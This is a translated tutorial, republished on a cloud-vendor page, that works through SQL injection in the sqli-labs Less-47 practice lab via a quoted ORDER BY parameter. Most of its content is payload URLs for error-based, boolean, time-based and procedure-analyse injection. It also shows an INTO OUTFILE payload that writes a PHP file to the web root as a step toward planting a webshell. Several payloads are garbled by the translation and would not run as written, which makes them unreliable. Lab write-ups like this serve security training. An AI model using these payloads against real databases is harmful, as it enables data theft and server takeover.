Sqli-labs less 47

Source: Internet
Author: User
Tags rand

Less-47

The SQL statement for this is $sql = "SELECT * from the users order by ' $id '";

The ID is converted into a character type, so according to the knowledge we mentioned above, we still classify it according to the injected location.

  1. , the parameter after order by

    We can only use and to do error and delay injection. We give a few payload examples below.

    ①and Rand is combined in a way that Payload:http://127.0.0.1/sqli-labs/less-47/index.php?sort=1%27and%20rand (ASCII (left (), 1)) =115)--+

    After switching to 116, Http://127.0.0.1/sqli-labs/Less-47/index.php?sort=1%27and%20rand (ASCII (Left (database (), 1)) =116)--+

    There are still problems in the later tests here, and we cannot use this method for accurate injection. Left here is just an example.

    ② can be used in the form of error

    HTTP://127.0.0.1/SQLI-LABS/LESS-47/?SORT=1%27AND%20 (Select%20count (*)%20from%20information_schema.columns% 20group%20by%20concat (0x3a,0x3a, (Select%20user ()), 0x3a,0x3a,floor (rand ()))--+

    You can see the contents of User (), and you can construct additional statements to inject.

    Here is an error injection, the principle and the above payload is the same, are using the principle of MySQL duplicates.

    Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20 (Select%20*%20from%20 (Select%20name_const (Version (), 1), NAME _const (Version (), 1)) x)--+

    Version () is repeated here, so it bursts

    ③ Delay Injection

    Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20If (ASCII (substr () (Database (),) =115,0,sleep (5))--+

    Because the database () is security, so the first letter of the S ASCII is 115, here directly, when changed to 116 or other numbers, it is time to delay, we do not show the map, can be scripted blasting.

    (2) Procedure analyse parameter after injection

    Using the procedure analyse parameter, we can perform an error injection. At the same time, there can be a limit parameter between procedure analyse and order by, and in practice we may also have a limit injection, which can be injected using procedure analyse.

    The following is a sample example

    Http://127.0.0.1/sqli-labs/Less-47/?sort=1%27procedure%20analyse (Extractvalue (rand (), concat (0x3a,version ())), 1 )--+

  2. Import export file into outfile parameter

    http://127.0.0.1/sqllib/less-47/?sort=1%27into%20outfile%20%22c:\\wamp\\www\\sqllib\\test.txt%22--+

    Import query results into a file

    At this time we can consider uploading the Web horse, using lines terminated by.

    into Outtfile c:\\wamp\\www\\sqllib\\test1.txt lines terminated by 0x (web horse for 16 binary conversion)

    http://127.0.0.1/sqllib/less-47/?sort=1%27into%20outfile%20%22c:\\wamp\\www\\sqllib\\test.php%22lines% 20terminated%20by%200x3c3f70687020706870696e666f28293b3f3e2020--+

    The 16 binary files here are <?php phpinfo ();? >

    We visit test.php

Sqli-labs less 47

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.